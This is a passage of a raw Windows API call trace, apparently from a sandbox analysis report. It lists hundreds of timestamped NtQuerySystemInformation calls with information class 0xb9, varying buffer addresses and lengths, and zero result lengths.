Length=0x20, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0273.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce48, Length=0x50, ResultLength=0x0) [0273.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x28, ResultLength=0x0) [0273.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) 